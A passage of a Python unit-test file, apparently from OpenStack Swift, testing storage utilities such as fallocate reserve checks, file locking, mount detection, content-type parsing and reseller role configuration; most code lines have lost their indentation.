self.assertEqual(
utils.rsync_module_interpolation('{device}', fake_device),
'sda1')
self.assertEqual(
utils.rsync_module_interpolation('{meta}', fake_device),
'just_a_string')
self.assertEqual(
utils.rsync_module_interpolation('{replication_ip}::object',
fake_device),
'127.0.0.2::object')
self.assertEqual(
utils.rsync_module_interpolation('{ip}::container{port}',
fake_device),
'127.0.0.1::container11')
self.assertEqual(
utils.rsync_module_interpolation(
'{replication_ip}::object_{device}', fake_device),
'127.0.0.2::object_sda1')
self.assertEqual(
utils.rsync_module_interpolation(
'127.0.0.3::object_{replication_port}', fake_device),
'127.0.0.3::object_12')
self.assertRaises(ValueError, utils.rsync_module_interpolation,
'{replication_ip}::object_{deivce}', fake_device)
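    # Exercise FALLOCATE_RESERVE handling with a no-op FallocateWrapper and a
    # stubbed os.fstatvfs, so the reserve checks run against fabricated
    # f_frsize/f_bavail values rather than a real filesystem.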
def test_fallocate_reserve(self):
class StatVFS(object):
f_frsize = 1024
f_bavail = 1
def fstatvfs(fd):
return StatVFS()
orig_FALLOCATE_RESERVE = utils.FALLOCATE_RESERVE
orig_fstatvfs = utils.os.fstatvfs
try:
fallocate = utils.FallocateWrapper(noop=True)
utils.os.fstatvfs = fstatvfs
# Want 1023 reserved, have 1024 * 1 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1023 reserved, have 512 * 2 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 1024 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 2048 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 2048 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 1023 reserved, have 1024 * 1 free, but file size is 1, so
# fails
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(1))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1023 <= 1023')
# Want 1022 reserved, have 1024 * 1 free, and file size is 1, so
# succeeds
utils.FALLOCATE_RESERVE = 1022
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(1)), 0)
# Want 1023 reserved, have 1024 * 1 free, and file size is 0, so
# succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, and even though
# file size is 0, since we're under the reserve, fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
finally:
utils.FALLOCATE_RESERVE = orig_FALLOCATE_RESERVE
utils.os.fstatvfs = orig_fstatvfs
def test_fallocate_func(self):
class FallocateWrapper(object):
def __init__(self):
self.last_call = None
def __call__(self, *args):
self.last_call = list(args)
self.last_call[-1] = self.last_call[-1].value
return 0
orig__sys_fallocate = utils._sys_fallocate
try:
utils._sys_fallocate = FallocateWrapper()
# Ensure fallocate calls _sys_fallocate even with 0 bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 0)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate even with negative bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, -5678)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate properly with positive
# bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 1)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 1])
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 10 * 1024 * 1024 * 1024)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 10 * 1024 * 1024 * 1024])
finally:
utils._sys_fallocate = orig__sys_fallocate
def test_generate_trans_id(self):
fake_time = 1366428370.5163341
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('')
self.assertEqual(len(trans_id), 34)
self.assertEqual(trans_id[:2], 'tx')
self.assertEqual(trans_id[23], '-')
self.assertEqual(int(trans_id[24:], 16), int(fake_time))
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('-suffix')
self.assertEqual(len(trans_id), 41)
self.assertEqual(trans_id[:2], 'tx')
self.assertEqual(trans_id[34:], '-suffix')
self.assertEqual(trans_id[23], '-')
self.assertEqual(int(trans_id[24:34], 16), int(fake_time))
def test_get_trans_id_time(self):
ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06')
self.assertEqual(ts, 1366428678)
self.assertEqual(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time(
'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix')
self.assertEqual(ts, 1366428678)
self.assertEqual(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time('')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('garbage')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright')
self.assertEqual(ts, None)
def test_tpool_reraise(self):
with patch.object(utils.tpool, 'execute', lambda f: f()):
self.assertTrue(
utils.tpool_reraise(MagicMock(return_value='test1')), 'test1')
self.assertRaises(
Exception,
utils.tpool_reraise, MagicMock(side_effect=Exception('test2')))
self.assertRaises(
BaseException,
utils.tpool_reraise,
MagicMock(side_effect=BaseException('test3')))
def test_lock_file(self):
flags = os.O_CREAT | os.O_RDWR
with NamedTemporaryFile(delete=False) as nt:
nt.write("test string")
nt.flush()
nt.close()
with utils.lock_file(nt.name, unlink=False) as f:
self.assertEqual(f.read(), "test string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, unlink=False, append=True) as f:
f.seek(0)
self.assertEqual(f.read(), "test string")
f.seek(0)
f.write("\nanother string")
f.flush()
f.seek(0)
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, timeout=3, unlink=False) as f:
try:
with utils.lock_file(
nt.name, timeout=1, unlink=False) as f:
self.assertTrue(
False, "Expected LockTimeout exception")
except LockTimeout:
pass
with utils.lock_file(nt.name, unlink=True) as f:
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
self.assertRaises(OSError, os.remove, nt.name)
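    # If the locked file is unlinked (or unlinked and recreated) right after
    # being opened, the file object lock_file() finally yields must not refer
    # to the original, now-unlinked inode.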
def test_lock_file_unlinked_after_open(self):
os_open = os.open
first_pass = [True]
def deleting_open(filename, flags):
# unlink the file after it's opened. once.
fd = os_open(filename, flags)
if first_pass[0]:
os.unlink(filename)
first_pass[0] = False
return fd
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.open', deleting_open):
with utils.lock_file(nt.name, unlink=True) as f:
self.assertNotEqual(os.fstat(nt.fileno()).st_ino,
os.fstat(f.fileno()).st_ino)
first_pass = [True]
def recreating_open(filename, flags):
# unlink and recreate the file after it's opened
fd = os_open(filename, flags)
if first_pass[0]:
os.unlink(filename)
os.close(os_open(filename, os.O_CREAT | os.O_RDWR))
first_pass[0] = False
return fd
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.open', recreating_open):
with utils.lock_file(nt.name, unlink=True) as f:
self.assertNotEqual(os.fstat(nt.fileno()).st_ino,
os.fstat(f.fileno()).st_ino)
def test_lock_file_held_on_unlink(self):
os_unlink = os.unlink
def flocking_unlink(filename):
# make sure the lock is held when we unlink
fd = os.open(filename, os.O_RDWR)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
os.close(fd)
os_unlink(filename)
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.unlink', flocking_unlink):
with utils.lock_file(nt.name, unlink=True):
pass
def test_lock_file_no_unlink_if_fail(self):
os_open = os.open
with NamedTemporaryFile(delete=True) as nt:
def lock_on_open(filename, flags):
# lock the file on another fd after it's opened.
fd = os_open(filename, flags)
fd2 = os_open(filename, flags)
fcntl.flock(fd2, fcntl.LOCK_EX | fcntl.LOCK_NB)
return fd
try:
timedout = False
with mock.patch('os.open', lock_on_open):
with utils.lock_file(nt.name, unlink=False, timeout=0.01):
pass
except LockTimeout:
timedout = True
self.assertTrue(timedout)
self.assertTrue(os.path.exists(nt.name))
def test_ismount_path_does_not_exist(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(os.path.join(tmpdir, 'bar')))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_not_mount(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
# Raises exception with _raw -- see next test.
utils.ismount(tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_raw_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount_raw, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_symlink(self):
tmpdir = mkdtemp()
try:
link = os.path.join(tmpdir, "tmp")
os.symlink("/tmp", link)
self.assertFalse(utils.ismount(link))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_root(self):
self.assertTrue(utils.ismount('/'))
def test_ismount_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
# Raises exception with _raw -- see next test.
utils.ismount(tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_raw_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount_raw, tmpdir)
finally:
shutil.rmtree(tmpdir)
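    # Fake os.lstat so the parent directory appears to be on a different
    # st_dev than the path itself; ismount() should then treat the path as a
    # mount point.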
def test_ismount_successes_dev(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
parent = _os_lstat(path)
return MockStat(parent.st_mode, parent.st_dev + 1,
parent.st_ino)
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_ino(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
return _os_lstat(path)
else:
parent_path = os.path.join(path, "..")
child = _os_lstat(path)
parent = _os_lstat(parent_path)
return MockStat(child.st_mode, parent.st_ino,
child.st_dev)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_parse_content_type(self):
self.assertEqual(utils.parse_content_type('text/plain'),
('text/plain', []))
self.assertEqual(utils.parse_content_type('text/plain;charset=utf-8'),
('text/plain', [('charset', 'utf-8')]))
self.assertEqual(
utils.parse_content_type('text/plain;hello="world";charset=utf-8'),
('text/plain', [('hello', '"world"'), ('charset', 'utf-8')]))
self.assertEqual(
utils.parse_content_type('text/plain; hello="world"; a=b'),
('text/plain', [('hello', '"world"'), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x="\""; a=b'),
('text/plain', [('x', r'"\""'), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x; a=b'),
('text/plain', [('x', ''), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x="\""; a'),
('text/plain', [('x', r'"\""'), ('a', '')]))
def test_override_bytes_from_content_type(self):
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=15'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEqual(listing_dict['bytes'], 15)
self.assertEqual(listing_dict['content_type'],
'text/plain;hello="world"')
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=hey'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEqual(listing_dict['bytes'], 1234)
self.assertEqual(listing_dict['content_type'],
'text/plain;hello="world"')
def test_clean_content_type(self):
subtests = {
'': '', 'text/plain': 'text/plain',
'text/plain; someother=thing': 'text/plain; someother=thing',
'text/plain; swift_bytes=123': 'text/plain',
'text/plain; someother=thing; swift_bytes=123':
'text/plain; someother=thing',
# Since Swift always tacks on the swift_bytes, clean_content_type()
# only strips swift_bytes if it's last. The next item simply shows
# that if for some other odd reason it's not last,
# clean_content_type() will not remove it from the header.
'text/plain; swift_bytes=123; someother=thing':
'text/plain; swift_bytes=123; someother=thing'}
for before, after in subtests.items():
self.assertEqual(utils.clean_content_type(before), after)
def test_quote(self):
res = utils.quote('/v1/a/c3/subdirx/')
assert res == '/v1/a/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/')
assert res == '/v1/a%26b/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/', safe='&')
assert res == '%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F'
unicode_sample = u'\uc77c\uc601'
account = 'abc_' + unicode_sample
valid_utf8_str = utils.get_valid_utf8_str(account)
account = 'abc_' + unicode_sample.encode('utf-8')[::-1]
invalid_utf8_str = utils.get_valid_utf8_str(account)
self.assertEqual('abc_%EC%9D%BC%EC%98%81',
utils.quote(valid_utf8_str))
self.assertEqual('abc_%EF%BF%BD%EF%BF%BD%EC%BC%9D%EF%BF%BD',
utils.quote(invalid_utf8_str))
def test_get_hmac(self):
self.assertEqual(
utils.get_hmac('GET', '/path', 1, 'abc'),
'b17f6ff8da0e251737aa9e3ee69a881e3e092e2f')
def test_get_policy_index(self):
# Account has no information about a policy
req = Request.blank(
'/sda1/p/a',
environ={'REQUEST_METHOD': 'GET'})
res = Response()
self.assertEqual(None, utils.get_policy_index(req.headers,
res.headers))
# The policy of a container can be specified by the response header
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'GET'})
res = Response(headers={'X-Backend-Storage-Policy-Index': '1'})
self.assertEqual('1', utils.get_policy_index(req.headers,
res.headers))
# The policy of an object to be created can be specified by the request
# header
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Backend-Storage-Policy-Index': '2'})
res = Response()
self.assertEqual('2', utils.get_policy_index(req.headers,
res.headers))
def test_get_log_line(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD', 'REMOTE_ADDR': '1.2.3.4'})
res = Response()
trans_time = 1.2
additional_info = 'some information'
server_pid = 1234
exp_line = '1.2.3.4 - - [01/Jan/1970:02:46:41 +0000] "HEAD ' \
'/sda1/p/a/c/o" 200 - "-" "-" "-" 1.2000 "some information" 1234 -'
with mock.patch(
'time.gmtime',
mock.MagicMock(side_effect=[time.gmtime(10001.0)])):
with mock.patch(
'os.getpid', mock.MagicMock(return_value=server_pid)):
self.assertEqual(
exp_line,
utils.get_log_line(req, res, trans_time, additional_info))
def test_cache_from_env(self):
# should never get logging when swift.cache is found
env = {'swift.cache': 42}
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env, False))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env, True))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
# check allow_none controls logging when swift.cache is not found
err_msg = 'ERROR: swift.cache could not be found in env!'
env = {}
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(None, utils.cache_from_env(env))
self.assertTrue(err_msg in logger.get_lines_for_level('error'))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(None, utils.cache_from_env(env, False))
self.assertTrue(err_msg in logger.get_lines_for_level('error'))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(None, utils.cache_from_env(env, True))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
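    # fsync_dir() should fsync and then close a descriptor for the directory,
    # raise when handed a plain file, and only log a warning when the fsync
    # itself fails with EBADF.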
def test_fsync_dir(self):
tempdir = None
fd = None
try:
tempdir = mkdtemp(dir='/tmp')
fd, temppath = tempfile.mkstemp(dir=tempdir)
_mock_fsync = mock.Mock()
_mock_close = mock.Mock()
with patch('swift.common.utils.fsync', _mock_fsync):
with patch('os.close', _mock_close):
utils.fsync_dir(tempdir)
self.assertTrue(_mock_fsync.called)
self.assertTrue(_mock_close.called)
self.assertTrue(isinstance(_mock_fsync.call_args[0][0], int))
self.assertEqual(_mock_fsync.call_args[0][0],
_mock_close.call_args[0][0])
# Not a directory - arg is file path
self.assertRaises(OSError, utils.fsync_dir, temppath)
logger = FakeLogger()
def _mock_fsync(fd):
raise OSError(errno.EBADF, os.strerror(errno.EBADF))
with patch('swift.common.utils.fsync', _mock_fsync):
with mock.patch('swift.common.utils.logging', logger):
utils.fsync_dir(tempdir)
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
finally:
if fd is not None:
os.close(fd)
os.unlink(temppath)
if tempdir:
os.rmdir(tempdir)
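    # renamer() should fsync the parent of every directory it had to create:
    # three fsync_dir calls when the object directory is new, just one (the
    # leaf) when the destination directory already exists.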
def test_renamer_with_fsync_dir(self):
tempdir = None
try:
tempdir = mkdtemp(dir='/tmp')
# Simulate part of object path already existing
part_dir = os.path.join(tempdir, 'objects/1234/')
os.makedirs(part_dir)
obj_dir = os.path.join(part_dir, 'aaa', 'a' * 32)
obj_path = os.path.join(obj_dir, '1425276031.12345.data')
# Object dir had to be created
_m_os_rename = mock.Mock()
_m_fsync_dir = mock.Mock()
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
utils.renamer("fake_path", obj_path)
_m_os_rename.assert_called_once_with('fake_path', obj_path)
            # fsync_dir on parents of all newly created dirs
self.assertEqual(_m_fsync_dir.call_count, 3)
# Object dir existed
_m_os_rename.reset_mock()
_m_fsync_dir.reset_mock()
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
utils.renamer("fake_path", obj_path)
_m_os_rename.assert_called_once_with('fake_path', obj_path)
# fsync_dir only on the leaf dir
self.assertEqual(_m_fsync_dir.call_count, 1)
finally:
if tempdir:
shutil.rmtree(tempdir)
def test_renamer_when_fsync_is_false(self):
_m_os_rename = mock.Mock()
_m_fsync_dir = mock.Mock()
_m_makedirs_count = mock.Mock(return_value=2)
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
with patch('swift.common.utils.makedirs_count',
_m_makedirs_count):
utils.renamer("fake_path", "/a/b/c.data", fsync=False)
_m_makedirs_count.assert_called_once_with("/a/b")
_m_os_rename.assert_called_once_with('fake_path', "/a/b/c.data")
self.assertFalse(_m_fsync_dir.called)
def test_makedirs_count(self):
tempdir = None
fd = None
try:
tempdir = mkdtemp(dir='/tmp')
os.makedirs(os.path.join(tempdir, 'a/b'))
# 4 new dirs created
dirpath = os.path.join(tempdir, 'a/b/1/2/3/4')
ret = utils.makedirs_count(dirpath)
self.assertEqual(ret, 4)
# no new dirs created - dir already exists
ret = utils.makedirs_count(dirpath)
self.assertEqual(ret, 0)
# path exists and is a file
fd, temppath = tempfile.mkstemp(dir=dirpath)
os.close(fd)
self.assertRaises(OSError, utils.makedirs_count, temppath)
finally:
if tempdir:
shutil.rmtree(tempdir)
class ResellerConfReader(unittest.TestCase):
def setUp(self):
self.default_rules = {'operator_roles': ['admin', 'swiftoperator'],
'service_roles': [],
'require_group': ''}
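    # The tests below exercise config_read_reseller_options: each configured
    # prefix is normalized by appending '_' (except the blank prefix ''),
    # duplicates and stray commas are dropped, and per-prefix options come
    # from keys such as 'PRE2_operator_roles' or, for the blank prefix,
    # "''operator_roles"; anything not configured falls back to the
    # default rules above.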
def test_defaults(self):
conf = {}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_'])
self.assertEqual(options['AUTH_'], self.default_rules)
def test_same_as_default(self):
conf = {'reseller_prefix': 'AUTH',
'operator_roles': 'admin, swiftoperator'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_'])
self.assertEqual(options['AUTH_'], self.default_rules)
def test_single_blank_reseller(self):
conf = {'reseller_prefix': ''}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''], self.default_rules)
def test_single_blank_reseller_with_conf(self):
conf = {'reseller_prefix': '',
"''operator_roles": 'role1, role2'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''].get('operator_roles'),
['role1', 'role2'])
self.assertEqual(options[''].get('service_roles'),
self.default_rules.get('service_roles'))
self.assertEqual(options[''].get('require_group'),
self.default_rules.get('require_group'))
def test_multiple_same_resellers(self):
conf = {'reseller_prefix': " '' , '' "}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
conf = {'reseller_prefix': '_, _'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['_'])
conf = {'reseller_prefix': 'AUTH, PRE2, AUTH, PRE2'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', 'PRE2_'])
def test_several_resellers_with_conf(self):
conf = {'reseller_prefix': 'PRE1, PRE2',
'PRE1_operator_roles': 'role1, role2',
'PRE1_service_roles': 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['PRE1_', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options['PRE1_'].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options['PRE1_'].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['PRE1_'].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_several_resellers_first_blank(self):
conf = {'reseller_prefix': " '' , PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_several_resellers_with_blank_comma(self):
conf = {'reseller_prefix': "AUTH , '', PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_'])
self.assertEqual(set(['admin', 'swiftoperator']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual([],
options['AUTH_'].get('service_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['AUTH_'].get('require_group'))
self.assertEqual('', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_stray_comma(self):
conf = {'reseller_prefix': "AUTH ,, PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', 'PRE2_'])
self.assertEqual(set(['admin', 'swiftoperator']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual([],
options['AUTH_'].get('service_roles'))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['AUTH_'].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_multiple_stray_commas_resellers(self):
conf = {'reseller_prefix': ' , , ,'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''], self.default_rules)
def test_unprefixed_options(self):
conf = {'reseller_prefix': "AUTH , '', PRE2",
"operator_roles": 'role1, role2',
"service_roles": 'role3, role4',
'require_group': 'auth_blank_group',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options['AUTH_'].get('service_roles')))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('auth_blank_group',
options['AUTH_'].get('require_group'))
self.assertEqual('auth_blank_group', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
class TestSwiftInfo(unittest.TestCase):
def tearDown(self):
utils._swift_info = {}
utils._swift_admin_info = {}
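    # register_swift_info stores capabilities in utils._swift_info, or in
    # utils._swift_admin_info when admin=True; the section names 'admin' and
    # 'disallowed_sections' are reserved and dotted keys are rejected, hence
    # the ValueError cases below.  get_swift_info can filter out sections,
    # including dotted sub-sections such as 'cap4.a.b.c'.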
def test_register_swift_info(self):
utils.register_swift_info(foo='bar')
utils.register_swift_info(lorem='ipsum')
utils.register_swift_info('cap1', cap1_foo='cap1_bar')
utils.register_swift_info('cap1', cap1_lorem='cap1_ipsum')
